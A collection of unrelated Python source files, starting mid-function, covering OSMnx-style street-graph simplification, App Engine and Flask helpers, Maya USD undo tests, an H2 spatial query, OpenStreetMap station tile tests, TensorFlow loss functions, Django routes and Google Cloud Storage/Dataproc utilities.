# If successor is endpoint, path is completed, so return
return path
if (path[-1] not in endpoints) and (path[0] in G.successors(path[-1])):
# If end of the path is not actually an endpoint and the path's
# first node is a successor of the path's final node, then this is
# actually a self loop, so add path's first node to end of path to
# close it
path.append(path[0])
return path
def get_paths_to_simplify(G: nx.Graph, strict: bool=True) -> List[List[int]]:
"""
Create a list of all the paths to be simplified between endpoint nodes. \
The path is ordered from the first endpoint, through the interstitial \
nodes, to the second endpoint.
Please note this method is taken directly from OSMnx, and can be found in \
its original form, here: \
https://github.com/gboeing/osmnx/blob/ \
c5916aab5c9b94c951c8fb1964c841899c9467f8/osmnx/simplify.py#L134-L181
Parameters
----------
G : networkx multidigraph
strict : bool
if False, allow nodes to be end points even if they fail all other \
rules but have edges with different OSM IDs
Returns
-------
paths_to_simplify : lists
Returns a nested set of lists, containing the paths (node ID arrays) \
for each group of vertices that can be consolidated
"""
# First identify all the nodes that are endpoints
endpoints = set([node for node in G.nodes()
if is_endpoint(G, node, strict=strict)])
# Initialize the list to be returned; an empty list
paths_to_simplify = []
# For each endpoint node, look at each of its successor nodes
for node in endpoints:
for successor in G.successors(node):
if successor not in endpoints:
# if the successor is not an endpoint, build a path from the
# endpoint node to the next endpoint node
try:
paths_to_simplify.append(
build_path(G,
successor,
endpoints,
path=[node, successor]))
except RuntimeError:
                    # Note: Recursion errors occur if some connected component
                    # is a self-contained ring in which no node is an
                    # endpoint; handle it by just ignoring that component and
                    # letting its topology remain intact
                    # (this should be a rare occurrence).
log(('Recursion error: exceeded max depth, moving on to '
'next endpoint successor'), level=lg.WARNING)
return paths_to_simplify
def simplify_graph(G_orig: nx.MultiDiGraph) -> nx.MultiDiGraph:
# Note: This operation borrows heavily from the operation of
# the same name in OSMnx, as it existed in this state/commit:
# github.com/gboeing/osmnx/blob/
# c5916aab5c9b94c951c8fb1964c841899c9467f8/osmnx/simplify.py
# Function on line 203
# Prevent upstream mutation, always copy
G = G_orig.copy()
# Used to track updates to execute
all_nodes_to_remove = []
all_edges_to_add = []
# TODO: Improve this method to not produce any mixed mode path
# removal proposals
# Utilize the recursive function from OSMnx that identifies paths based
# on isolated successor nodes
paths_to_consider = get_paths_to_simplify(G)
# Iterate through the resulting path arrays to target
for path in paths_to_consider:
# If the path is not all one mode of travel, skip the
# proposed simplification
if not _path_has_consistent_mode_type(G, path):
continue
# Keep track of the edges to be removed so we can
# assemble a LineString geometry with all of them
edge_attributes = {}
# Work from the last edge through, "wrapped around," to the beginning
for u, v in zip(path[:-1], path[1:]):
# Should not be multiple edges between interstitial nodes
only_one_edge = G.number_of_edges(u, v) == 1
if not only_one_edge:
log(('Multiple edges between "{}" and "{}" '
'found when simplifying').format(u, v))
# We ask for the 0th edge as we assume there is only one
edge = G.edges[u, v, 0]
for key in edge:
if key in edge_attributes:
# If key already exists in dict, append
edge_attributes[key].append(edge[key])
else:
# Otherwise, initialize a list
edge_attributes[key] = [edge[key]]
# Note: In peartree, we opt to not preserve any other elements;
# we only keep length, mode and - in the case of simplified
# geometries - the shape of the simplified route
edge_attributes['mode'] = edge_attributes['mode'][0]
edge_attributes['length'] = sum(edge_attributes['length'])
# Construct the geometry from the points array
points_array = []
for node in path:
p = Point((G.nodes[node]['x'], G.nodes[node]['y']))
points_array.append(p)
edge_attributes['geometry'] = LineString(points_array)
# Add nodes and edges to respective lists for processing
all_nodes_to_remove.extend(path[1:-1])
all_edges_to_add.append({'origin': path[0],
'destination': path[-1],
'attr_dict': edge_attributes})
# For each edge to add in the list we assembled, create a new edge between
# the origin and destination
for edge in all_edges_to_add:
G.add_edge(edge['origin'], edge['destination'], **edge['attr_dict'])
# Remove all the interstitial nodes between the new edges, which will also
# knock out the related edges from the graph
G.remove_nodes_from(set(all_nodes_to_remove))
# TODO: This step could be significantly optimized (as well as
# parameterized, made optional)
# A final step that cleans out all duplicate edges (not desired in a
# simplified network)
mult_edges = []
mult_edges_full = []
for fr, to, edge in G.edges(data=True):
if G.number_of_edges(fr, to) > 1:
mult_edges.append((fr, to))
mult_edges_full.append((fr, to, edge))
# Clean out the permutations to just one of each
mult_edges = set(mult_edges)
# TODO: This nested for loop is sloppy; clean up (numpy scalars, perhaps)
for fr1, to1 in mult_edges:
subset_edges = []
for fr2, to2, edge in mult_edges_full:
if fr1 == fr2 and to1 == to2:
subset_edges.append(edge)
keep = max(subset_edges, key=lambda x: x['length'])
# Drop all the edges
edge_ct = len(subset_edges)
G.remove_edges_from([(fr1, to1)] * edge_ct)
# Then just re-add the one that we want
G.add_edge(fr1, to1, **keep)
return G
|
import json
import os
import time
import uuid
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
from models.profile import Profile, TeeShirtSize
def getUserId(user, id_type="email"):
"""
Retrieve User id from a given user object
:param user: A current user object from API endpoint.
Example: user = endpoints.get_current_user()
:param id_type: define return type of this function.
- email: return user email address
- oauth: return user information from google+ oauth.
- custom: return current user id or generate unique id
:return: email, oauth user id, or user id of the corresponding entity
"""
if id_type == "email":
return user.email()
if id_type == "oauth":
"""A workaround implementation for getting userid."""
auth = os.getenv('HTTP_AUTHORIZATION')
bearer, token = auth.split()
token_type = 'id_token'
if 'OAUTH_USER_ID' in os.environ:
token_type = 'access_token'
url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?%s=%s'
% (token_type, token))
user = {}
wait = 1
for i in range(3):
resp = urlfetch.fetch(url)
if resp.status_code == 200:
user = json.loads(resp.content)
break
elif resp.status_code == 400 and 'invalid_token' in resp.content:
url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?%s=%s'
% ('access_token', token))
else:
time.sleep(wait)
wait = wait + i
return user.get('user_id', '')
if id_type == "custom":
        # implement your own user_id creation and retrieval algorithm
# this is just a sample that queries datastore for an existing profile
# and generates an id if profile does not exist for an email
        # Fetch the first matching profile entity (None if it does not exist)
        profile = Profile.query(Profile.mainEmail == user.email()).get()
        if profile:
            return profile.key.id()
        else:
            return str(uuid.uuid1().get_hex())
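# Illustrative usage sketch (not part of the original module): inside an
# Endpoints API method the current user is typically resolved first, e.g.
# (hypothetical):
# user = endpoints.get_current_user()
# user_id = getUserId(user)                   # defaults to the email address
# oauth_id = getUserId(user, id_type="oauth")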
def getProfileFromUser(user):
"""
Return user Profile from datastore, creating new one if non-existent.
:param user: A current user object from API endpoint.
Example: user = endpoints.get_current_user()
:return: Profile object
"""
user_id = getUserId(user)
p_key = ndb.Key(Profile, user_id)
profile = p_key.get()
if not profile:
profile = Profile(
key=p_key,
displayName=user.nickname(),
mainEmail=user.email(),
teeShirtSize=str(TeeShirtSize.NOT_SPECIFIED),
)
profile.put()
# return Profile
return profile
|
#coding:utf-8
import json as Json
from flask import Response,make_response
from mantis.fundamental.errors import ErrorDefs,ValueEntry
SUCC = 0
ERROR = 1
class CallReturn(object):
def __init__(self,status=SUCC,errcode=0,errmsg='',result=None):
self.status = status
self.errcode = errcode
self.errmsg = errmsg
self.result = result
def assign(self,result):
self.result = result
return self
@property
def json(self):
data = {
'status':self.status,
'errcode':self.errcode,
'errmsg':self.errmsg
}
errmsg = self.errmsg
if isinstance(self.errcode,ValueEntry):
data['errcode'] = self.errcode.value
if not errmsg:
errmsg = self.errcode.comment
data['errmsg'] = errmsg
if self.result is not None:
data['result'] = self.result
return Json.dumps(data)
@property
def response(self):
resp = Response(self.json)
resp.headers['Content-Type'] = "application/json"
return resp
def ErrorReturn(errcode,errmsg='',result=None):
return CallReturn(ERROR,errcode,errmsg,result)
CR = CallReturn
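# Illustrative usage sketch (not part of the original module), assuming a
# hypothetical Flask view; the ErrorDefs member below is a placeholder:
# @app.route('/ping')
# def ping():
#     return CR(result={'pong': True}).response
# @app.route('/fail')
# def fail():
#     return ErrorReturn(ErrorDefs.Unknown, 'something went wrong').response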
|
#!/usr/bin/env python
#
# Copyright 2020 Autodesk
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import maya.cmds as cmds
from pxr import Tf, Usd, UsdGeom, Gf
import mayaUsd.lib as mayaUsdLib
class TestUsdUndoManager(unittest.TestCase):
@classmethod
def setUpClass(cls):
cmds.loadPlugin('mayaUsdPlugin')
def setUp(self):
# create a stage in memory
self.stage = Usd.Stage.CreateInMemory()
# track the edit target layer
mayaUsdLib.UsdUndoManager.trackLayerStates(self.stage.GetRootLayer())
# clear selection to start off
cmds.select(clear=True)
def testSimpleUndoRedo(self):
'''
Simple test to demonstrate the basic usage of undo/redo service.
'''
# start with a new file
cmds.file(force=True, new=True)
# get pseudo root prim
defaultPrim = self.stage.GetPseudoRoot()
# get the current number of commands on the undo queue
nbCmds = cmds.undoInfo(q=True)
self.assertEqual(cmds.undoInfo(q=True), 0)
self.assertEqual(len(defaultPrim.GetChildren()), 0)
# create undo block
with mayaUsdLib.UsdUndoBlock():
prim = self.stage.DefinePrim('/World', 'Sphere')
self.assertTrue(bool(prim))
# check number of children under the root
self.assertEqual(len(defaultPrim.GetChildren()), 1)
# demonstrate there is one additional command on the undo queue
# and that it's our command.
self.assertEqual(cmds.undoInfo(q=True), nbCmds+1)
# undo
cmds.undo()
# check number of children under the root
self.assertEqual(len(defaultPrim.GetChildren()), 0)
# redo
cmds.redo()
# check number of children under the root
self.assertEqual(len(defaultPrim.GetChildren()), 1)
def testNestedUsdUndoBlock(self):
'''
Nested UsdUndoBlock are supported but only the top level block
will transfer the edits to UsdUndoableItem.
'''
# start with a new file
cmds.file(force=True, new=True)
# get the current number of commands on the undo queue
nbCmds = cmds.undoInfo(q=True)
self.assertEqual(cmds.undoInfo(q=True), 0)
with mayaUsdLib.UsdUndoBlock():
prim = self.stage.DefinePrim('/World')
with mayaUsdLib.UsdUndoBlock():
prim.SetActive(False)
with mayaUsdLib.UsdUndoBlock():
prim.SetActive(True)
with mayaUsdLib.UsdUndoBlock():
prim.SetActive(False)
# expect to have 2 items on the undo queue
self.assertEqual(cmds.undoInfo(q=True), nbCmds+2)
|
import jaydebeapi
driver = 'org.h2.Driver'
url = 'jdbc:h2:tcp://192.168.0.242:9101/~/ship5'
username = 'sa'
password = ''
jar = r'D:\development\h2gis-standalone\h2gis-dist-1.5.0.jar'
conn = jaydebeapi.connect(driver, url, [username, password], jar)
curs = conn.cursor()
LINESTRING="LINESTRING(123.85507399897297 36.35646292498599,123.76116568903645 36.54704329302798,123.7572041259261 36.55419585040103,123.64867598871906 36.72953078082095,123.52717406611164 36.89056250384341,123.47056777338703 36.95641753008853,123.37236220698078 37.06010481646548,123.36652953486164 37.06589934161197,123.16477019648273 37.24630019000064,122.926736901805 37.42191740801822,122.87312896113117 37.45738264849673,122.77634436945637 37.51833388140689,122.72367102961262 37.54999968340884,122.71519858698566 37.55500075152408,122.70384127955158 37.561666934995756,122.6467018828841 37.59455534747134,122.63826281885822 37.59932371905337,122.61623866419514 37.6116661720563,122.60121829371174 37.61999937823306,122.59221846918781 37.624960392027006,122.59214598993977 37.625000446348295,122.58303267817219 37.6299996071149,122.56774337153156 37.638332813291655,122.54923446039875 37.64833304217349,122.51684577326496 37.66560599139224,122.47554976801594 37.68722578814517,122.47163970331867 37.689249485044584,122.47019011835773 37.68999907305728,122.4362698302718 37.70738837054263,122.32436377863606 37.762844532041655,122.28107268671711 37.7835640602399,122.27314765314777 37.78731581500064,122.25967604975422 37.79366347125064,122.14418036799152 37.846659153013334,122.08873374323566 37.871250598936186,122.07710654597004 37.87634131243716,122.06227881769856 37.8828015022565,122.01850516657551 37.90166708758365,121.99108321528156 37.91333243182193,121.94743926386555 37.93166586688052,121.94541556696613 37.932508914976225,121.93493468622883 37.9368672066022,121.87482840876301 37.96155974200259,121.86805350641926 37.96431204607974,121.70179183344563 38.02999922564517,121.6780215011092 38.039116352110014,121.67709834437092 38.039469211607084,121.66394908289631 38.04448363116275,121.56544787745197 38.08144041827212,121.42016322474201 38.134134738950834,121.41327197413166 38.136583774595366,121.40484149317463 38.139574497251616,121.39893157343586 38.14166685870181,121.33697135309895 38.16341635516177,121.32283027033527 38.16833349993716,121.29391677241047 38.178333728819,121.2793865905257 38.1833328895856,121.2452765212508 38.195000141172514,121.22566325525959 38.201666324644194,121.14049250940998 38.23026701739322,121.11883551935871 38.23745199969302,121.08451468805988 38.2487682991315,121.07568080286701 38.25166746905337,121.00910575251301 38.27334067156802,120.8505421386214 38.32378241351138,120.8304348693343 38.3300671272565,120.79810244898518 38.340122669248686,120.60154254297932 38.40000006487857,120.58482272486408 38.40499922564517,120.53309256891926 38.42038008502017,120.5222073302718 38.42359968951236,120.51112182001789 38.426872699766264,120.47818572382648 38.436563938169584,120.46077544550617 38.44166609576236,120.44477469782551 38.446342914610014,120.27012259821613 38.49666640093814,120.26233298639973 38.498880832700834,120.24665076594074 38.50333258440982,120.21654708246906 38.51185080340396,120.19355208735188 38.51833388140689,120.18010337214191 38.522116153745756,120.15784461359699 38.528360813169584,120.14007575373371 38.53333327105533,120.11020095209797 38.541666477232084,120.08621985773762 38.548332660703764,120.074197839305 38.55166670611392,120.06818206171711 38.553333728819,120.06018645624836 38.55554625323306,120.04593093256672 38.55948683550845,120.03803069452961 38.561666934995756,120.0186501250716 38.56700751116763,120.0077687011214 38.570000141172514,119.99563033442219 38.57333418658267,119.9678688750716 38.58094069293033,119.85980231623371 
38.61031576922427,119.85480124811848 38.6116661720563,119.83626181940754 38.61666724017154,119.81768805842121 38.62166640093814,119.81192786555012 38.62321516802798,119.8052826629134 38.625000446348295,119.80380446772297 38.62539717486392,119.80141074518879 38.62603995135318,119.78981406550129 38.629150836973295,119.78875357966145 38.629435031919584,119.78481871943195 38.63048979571353,119.78042418818195 38.631666629819975,119.77748305659016 38.63245436480533,119.75163085322102 38.63936659625064,119.74908072809895 38.64004751971255,119.74705130915363 38.64058920672427,119.7415619597884 38.64205405047427,119.73676307062824 38.64333388140689,119.73050696711262 38.64500090411197,119.72956282953938 38.6452526741315,119.7294769988509 38.64527556231509,119.72776515345295 38.645731418638334,119.72425563196857 38.64666601946841,119.72285849909504 38.64703795245181,119.71803672175129 38.648321598081694,119.71542556147297 38.64901587298404,119.70783812861164 38.65103384783755,119.70625884394367 38.65145346453677,119.70618636469563 38.6514725380231,119.7051678405257 38.65174338152896,119.70478064875324 38.65184637835513,119.70437056879719 38.6519550972272,119.70376021723469 38.65211722186099,119.70342452387531 38.65220686724673,119.70310027460773 38.65229269793521,119.70290763239582 38.652344196348295,119.70287806849201 38.65235182574283,119.7028713927718 38.65235373309146,119.70285613398273 38.652357547788725,119.70274169306477 38.65238806536685,119.70245463709553 38.65246435931216,119.70242507319172 38.652471988706694,119.70241172175129 38.65247580340396,119.70228965143879 38.65250822833072,119.70218188624104 38.65253683856021,119.70206649164875 38.652567356138334,119.6991806731673 38.653334110288725,119.65940768580158 38.66387602618228,119.56526858668049 38.688665836362944,119.56285960535725 38.689297168760405,119.46577269892414 38.71463248065005,119.44843489985188 38.71913382342349,119.36452300409992 38.7408280067731,119.31309993128498 38.754049747495756,119.28042037348469 38.762424915342436,119.2668362365218 38.76590010455142,119.19580085138996 38.78401610186587,119.19523055414875 38.78416106036197,119.19337088923176 38.784634082822905,119.18909556727131 38.78572127154361,119.18796260218342 38.78600928118716,119.18763167719563 38.786093204527006,119.18678481440266 38.786308734922514,119.18646247248371 38.786390750913725,119.18619925837238 38.78645750811587,119.18592173914631 38.78652808001529,119.13034255366047 38.80062910845767,119.1293621764632 38.800877063779936,119.12188823084553 38.802769153623686,119.10350997309406 38.80741736224185,119.07327563624104 38.815052478819,118.98544795374592 38.83714911273013,118.96637256006916 38.841932743101225,118.92140014033039 38.853189914732084,118.78167159418781 38.88799139788638,118.71773345331867 38.903835742979155,118.71703917841633 38.90400740435611,118.71449572901447 38.904636829404936,118.71165854792316 38.90533873370181,118.59876067499836 38.9331993751813,118.58602912287434 38.936333148985014,118.47785765986164 38.96290060809146,118.38089949946125 38.986633747129545)"
sql = "select * from world_country where geom && st_geomfromtext('"+LINESTRING+"') and st_intersects(st_geomfromtext('"+LINESTRING+"'),geom)"
curs.execute(sql)
result = curs.fetchall()[0][0]
print(result)
# for row in result:
# print(row[0], row[1], row[2])
|
stations = [
# Stations and lines, etc... used in exploring the NYC Penn Station
# object network.
#https://www.openstreetmap.org/node/895371274
#https://www.openstreetmap.org/relation/1359387
#https://www.openstreetmap.org/relation/1377996
#https://www.openstreetmap.org/relation/1377998
#https://www.openstreetmap.org/relation/1377999
#https://www.openstreetmap.org/relation/1380577
#https://www.openstreetmap.org/relation/1590286
#https://www.openstreetmap.org/relation/1809808
#https://www.openstreetmap.org/relation/1834644
#https://www.openstreetmap.org/relation/1897938
#https://www.openstreetmap.org/relation/1900976
#https://www.openstreetmap.org/relation/207401
#https://www.openstreetmap.org/relation/2648181
#https://www.openstreetmap.org/relation/2807121
#https://www.openstreetmap.org/relation/4044002
#https://www.openstreetmap.org/relation/4073816
#https://www.openstreetmap.org/relation/4234377
#https://www.openstreetmap.org/relation/4234911
#https://www.openstreetmap.org/relation/4445771
#https://www.openstreetmap.org/relation/4452779
#https://www.openstreetmap.org/relation/4460896
#https://www.openstreetmap.org/relation/4467189
#https://www.openstreetmap.org/relation/4467190
#https://www.openstreetmap.org/relation/4748609
#https://www.openstreetmap.org/relation/4799100
#https://www.openstreetmap.org/relation/4799101
(13, 2412, 3078, 'Penn Station', 895371274L, 1, [
'2100-2297', # Acela Express
'68-69', # Adirondack
'50-51', # Cardinal
'79-80', # Carolinian
'19-20', # Crescent
'230-296', # Empire Service
'600-674', # Keystone Service
'63', # Maple Leaf (Northbound)
'64', # Maple Leaf (Southbound)
'89-90', # Palmetto
'42-43', # Pennsylvanian
'97-98', # Silver Meteor
'91-92', # Silver Star
'54-57', # Vermonter
]),
#https://www.openstreetmap.org/node/1129957203
#https://www.openstreetmap.org/node/1129957312
#https://www.openstreetmap.org/node/845910705
#https://www.openstreetmap.org/relation/1401995
#https://www.openstreetmap.org/relation/1402004
#https://www.openstreetmap.org/relation/1403277
#https://www.openstreetmap.org/relation/1403278
(13, 2352, 3122, 'Camden Station', 845910705L, 5, ['Camden Line']),
#https://www.openstreetmap.org/node/297863017
#https://www.openstreetmap.org/relation/2124174
#https://www.openstreetmap.org/relation/3433312
#https://www.openstreetmap.org/relation/3433314
#https://www.openstreetmap.org/relation/3433316
#https://www.openstreetmap.org/relation/3435875
#https://www.openstreetmap.org/relation/63250
#https://www.openstreetmap.org/relation/63572
#https://www.openstreetmap.org/relation/91022
#https://www.openstreetmap.org/way/256270166
(13, 1309, 3166, 'Castro MUNI', 297863017L, 1, ['K', 'L', 'M', 'T']),
#https://www.openstreetmap.org/node/2058688536
#https://www.openstreetmap.org/node/2058688538
#https://www.openstreetmap.org/node/3426208027
#https://www.openstreetmap.org/node/3426249715
#https://www.openstreetmap.org/node/3426249720
#https://www.openstreetmap.org/node/3426249721
#https://www.openstreetmap.org/relation/1269021
#https://www.openstreetmap.org/relation/1359387
#https://www.openstreetmap.org/relation/1388639
#https://www.openstreetmap.org/relation/1388641
#https://www.openstreetmap.org/relation/1388648
#https://www.openstreetmap.org/relation/1390116
#https://www.openstreetmap.org/relation/1390117
#https://www.openstreetmap.org/relation/1390133
#https://www.openstreetmap.org/relation/1402781
#https://www.openstreetmap.org/relation/1405499
#https://www.openstreetmap.org/relation/1590286
#https://www.openstreetmap.org/relation/1809808
#https://www.openstreetmap.org/relation/1897938
#https://www.openstreetmap.org/relation/1900976
#https://www.openstreetmap.org/relation/206515
#https://www.openstreetmap.org/relation/2629937
#https://www.openstreetmap.org/relation/2629938
#https://www.openstreetmap.org/relation/2648181
#https://www.openstreetmap.org/relation/2807121
#https://www.openstreetmap.org/relation/4044002
#https://www.openstreetmap.org/relation/4460896
#https://www.openstreetmap.org/relation/4744254
#https://www.openstreetmap.org/relation/4748609
#https://www.openstreetmap.org/relation/4799100
#https://www.openstreetmap.org/relation/4799101
#https://www.openstreetmap.org/way/30953448
#https://www.openstreetmap.org/way/32272623
#https://www.openstreetmap.org/way/43352433
#https://www.openstreetmap.org/way/60185604
#https://www.openstreetmap.org/way/60185611
(13, 2385, 3102, '30th Street', 32272623L, 1, [
'2100-2297', # Acela Express
'79-80', # Carolinian
'19-20', # Crescent
'600-674', # Keystone Service
'82-198', # Northeast Regional (Boston/Springfield & Lynchburg)
'89-90', # Palmetto
'Chestnut Hill West Line', # SEPTA - Chestnut Hill West Line
'Cynwyd Line', # SEPTA - Cynwyd Line
'Media/Elwyn Line', # SEPTA - Media/Elwyn Line
'Trenton Line', # SEPTA - Trenton Line
'Wilmington/Newark Line', # SEPTA - Wilmington/Newark Line
'91-92', # Silver Star
])
]
for z, x, y, name, osm_id, expected_rank, expected_routes in stations:
with features_in_tile_layer(z, x, y, 'pois') as pois:
found = False
for poi in pois:
props = poi['properties']
if props['id'] == osm_id:
found = True
routes = list()
for typ in ['train', 'subway', 'light_rail', 'tram']:
routes.extend(props.get('%s_routes' % typ, list()))
rank = props['kind_tile_rank']
if rank > expected_rank:
raise Exception("Found %r, and was expecting a rank "
"of %r or less, but got %r."
% (name, expected_rank, rank))
for r in expected_routes:
count = 0
for route in routes:
if r in route:
count = count + 1
if count == 0:
raise Exception("Found %r, and was expecting at "
"least one %r route, but found "
"none. Routes: %r"
% (name, r, routes))
if not found:
raise Exception("Did not find %r (ID=%r) in tile." % (name, osm_id))
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
def l1_loss(predictions, targets):
total_elements = (tf.shape(targets)[0] * tf.shape(targets)[1] * tf.shape(targets)[2]
* tf.shape(targets)[3])
total_elements = tf.to_float(total_elements)
    loss = tf.reduce_sum(tf.abs(predictions - targets))
loss = tf.div(loss, total_elements)
return loss
def l2_loss(predictions, targets):
total_elements = (tf.shape(targets)[0] * tf.shape(targets)[1] * tf.shape(targets)[2]
* tf.shape(targets)[3])
total_elements = tf.to_float(total_elements)
loss = tf.reduce_sum(tf.square(predictions-targets))
loss = tf.div(loss, total_elements)
return loss
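# Minimal usage sketch (an assumption: TensorFlow 1.x, where tf.to_float,
# tf.div and tf.Session are available). The tensors below are placeholders
# chosen only for illustration.
if __name__ == "__main__":
    predictions = tf.zeros([2, 4, 4, 3])
    targets = tf.ones([2, 4, 4, 3])
    with tf.Session() as sess:
        # both losses evaluate to 1.0 here: mean absolute and mean squared difference of 0 vs 1
        print(sess.run([l1_loss(predictions, targets), l2_loss(predictions, targets)]))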
|
from django.urls import path
from .views import *
urlpatterns = [
path('simple', SimpleOrderView.as_view()),
path('simple/<str:order_id>', SimpleOrderView.as_view()),
path('pintuan/<str:action>', PinTuanOrderView.as_view()),
path('pay/notify', pay_notify),
]
|
import os, csv
from google.cloud import storage
from google.cloud import bigquery
from google.cloud.bigquery import LoadJobConfig
from google.cloud.bigquery import SchemaField
import googleapiclient.discovery
#########################
#########################
##### CLOUD STORAGE #####
#########################
#########################
#https://github.com/GoogleCloudPlatform/python-docs-samples/blob/master/storage/cloud-client/snippets.py
def list_buckets(project):
storage_client = storage.Client(project=project)
buckets = storage_client.list_buckets()
for bucket in buckets:
print('Bucket {} found'.format(bucket.name))
def create_bucket(bucket_name, project):
storage_client = storage.Client(project=project)
bucket = storage_client.create_bucket(bucket_name)
print('Bucket {} created'.format(bucket.name))
def delete_bucket(bucket_name, project):
storage_client = storage.Client(project=project)
bucket = storage_client.get_bucket(bucket_name)
bucket.delete()
print('Bucket {} deleted'.format(bucket.name))
def list_blobs(bucket_name, project):
storage_client = storage.Client(project=project)
bucket = storage_client.get_bucket(bucket_name)
blobs = bucket.list_blobs()
for blob in blobs:
print('File {} found'.format(blob.name))
def upload_blob(bucket_name, source_file_name, destination_blob_name, project):
storage_client = storage.Client(project=project)
bucket = storage_client.get_bucket(bucket_name)
blob = bucket.blob(destination_blob_name)
blob.upload_from_filename(source_file_name)
print('File {} uploaded to {}'.format(
source_file_name,
destination_blob_name))
def download_blob(bucket_name, source_blob_name, destination_file_name, project):
storage_client = storage.Client(project=project)
bucket = storage_client.get_bucket(bucket_name)
blob = bucket.blob(source_blob_name)
blob.download_to_filename(destination_file_name)
print('Blob {} downloaded to {}'.format(source_blob_name, destination_file_name))
def delete_blob(bucket_name, blob_name, project):
storage_client = storage.Client(project=project)
bucket = storage_client.get_bucket(bucket_name)
blob = bucket.blob(blob_name)
blob.delete()
print('Blob {} deleted'.format(blob_name))
def delete_all_buckets_and_blobs(project):
storage_client = storage.Client(project=project)
buckets = storage_client.list_buckets()
for bucket in buckets:
blobs = bucket.list_blobs()
for blob in blobs:
blob.delete()
print('Blob {} deleted'.format(blob))
bucket.delete()
print('Bucket {} deleted'.format(bucket))
#########################
#########################
####### DATAPROC ########
#########################
#########################
#https://github.com/GoogleCloudPlatform/python-docs-samples/blob/master/dataproc/submit_job_to_cluster.py
def get_pyspark_file(filename):
f = open(filename, 'rb')
return f, os.path.basename(filename)
def get_region_from_zone(zone):
try:
region_as_list = zone.split('-')[:-1]
return '-'.join(region_as_list)
except (AttributeError, IndexError, ValueError):
raise ValueError('Invalid zone provided, please check your input.')
def upload_pyspark_file(project_id, bucket_name, filename, file):
client = storage.Client(project=project_id)
bucket = client.get_bucket(bucket_name)
blob = bucket.blob(filename)
blob.upload_from_file(file)
def download_output(project_id, cluster_id, output_bucket, job_id):
client = storage.Client(project=project_id)
bucket = client.get_bucket(output_bucket)
output_blob = (
'google-cloud-dataproc-metainfo/{}/jobs/{}/driveroutput.000000000'
.format(cluster_id, job_id))
return bucket.blob(output_blob).download_as_string()
def create_cluster(project, zone, region, cluster_name,
master_type='n1-standard-1',
worker_type='n1-standard-1',
sec_worker_type='n1-standard-1',
no_masters=1, no_workers=2, no_sec_workers=1,
sec_worker_preemptible=True,
dataproc_version='1.2'):
print('Creating cluster...')
dataproc = get_client()
zone_uri = \
'https://www.googleapis.com/compute/v1/projects/{}/zones/{}'.format(
project, zone)
# cluster_data defines cluster: https://cloud.google.com/dataproc/docs/reference/rest/v1/ClusterConfig
cluster_data = {
'projectId': project,
'clusterName': cluster_name,
'config': {
'gceClusterConfig': {
'zoneUri': zone_uri
},
'masterConfig': {
'numInstances': no_masters,
'machineTypeUri': master_type
},
'workerConfig': {
'numInstances': no_workers,
'machineTypeUri': worker_type
},
'secondaryWorkerConfig': {
'numInstances': no_sec_workers,
'machineTypeUri': sec_worker_type,
"isPreemptible": sec_worker_preemptible
},
'softwareConfig': {
'imageVersion': dataproc_version
}
}
}
result = dataproc.projects().regions().clusters().create(
projectId=project,
region=region,
body=cluster_data).execute()
return result
def wait_for_cluster_creation(project_id, region, cluster_name):
print('Waiting for cluster creation...')
dataproc = get_client()
while True:
result = dataproc.projects().regions().clusters().list(
projectId=project_id,
region=region).execute()
cluster_list = result['clusters']
cluster = [c
for c in cluster_list
if c['clusterName'] == cluster_name][0]
if cluster['status']['state'] == 'ERROR':
raise Exception(result['status']['details'])
if cluster['status']['state'] == 'RUNNING':
print("Cluster created.")
break
def list_clusters_with_details(project, region):
dataproc = get_client()
result = dataproc.projects().regions().clusters().list(projectId=project, region=region).execute()
if result:
cluster_list = result['clusters']
for cluster in cluster_list:
print("{} - {}".format(cluster['clusterName'], cluster['status']['state']))
return result
else:
print('There are no Dataproc Clusters in this Project and Region')
def get_cluster_id_by_name(cluster_list, cluster_name):
cluster = [c for c in cluster_list if c['clusterName'] == cluster_name][0]
return cluster['clusterUuid'], cluster['config']['configBucket']
def submit_pyspark_job(project, region, cluster_name, bucket_name, filename):
dataproc = get_client()
job_details = {
'projectId': project,
'job': {
'placement': {
'clusterName': cluster_name
},
'pysparkJob': {
'mainPythonFileUri': 'gs://{}/{}'.format(bucket_name, filename)
}
}
}
result = dataproc.projects().regions().jobs().submit(
projectId=project,
region=region,
body=job_details).execute()
job_id = result['reference']['jobId']
print('Submitted job ID {}'.format(job_id))
return job_id
def delete_cluster(project, region, cluster):
dataproc = get_client()
print('Tearing down cluster')
result = dataproc.projects().regions().clusters().delete(
projectId=project,
region=region,
clusterName=cluster).execute()
return result
def wait_for_job(project, region, job_id):
dataproc = get_client()
print('Waiting for job to finish...')
while True:
result = dataproc.projects().regions().jobs().get(
projectId=project,
region=region,
jobId=job_id).execute()
# Handle exceptions
if result['status']['state'] == 'ERROR':
raise Exception(result['status']['details'])
elif result['status']['state'] == 'DONE':
print('Job finished.')
return result
def get_client():
dataproc = googleapiclient.discovery.build('dataproc', 'v1')
return dataproc
# Picks a PySpark file from a local file
# Creates a new Dataproc cluster
# Uploads the PySpark file to GCS
# Connects to created Dataproc cluster
# Runs job in Dataproc cluster
# Waits for job to complete, writes results to GCS bucket
# Downloads results from GCS to local file
# Deletes Dataproc cluster
def submit_pyspark_job_to_cluster(project_id, zone, cluster_name,
bucket_name, pyspark_file=None, create_new_cluster=True,
master_type='n1-standard-1',
worker_type='n1-standard-1',
sec_worker_type='n1-standard-1',
no_masters=1,
no_workers=2,
no_sec_workers=1,
sec_worker_preemptible=True,
dataproc_version='1.2'):
region = get_region_from_zone(zone)
try:
spark_file, spark_filename = get_pyspark_file(pyspark_file)
if create_new_cluster:
            create_cluster(project_id, zone, region, cluster_name,
                           master_type=master_type, worker_type=worker_type,
                           sec_worker_type=sec_worker_type, no_masters=no_masters,
                           no_workers=no_workers, no_sec_workers=no_sec_workers,
                           sec_worker_preemptible=sec_worker_preemptible,
                           dataproc_version=dataproc_version)
wait_for_cluster_creation(project_id, region, cluster_name)
upload_pyspark_file(project_id, bucket_name, spark_filename, spark_file)
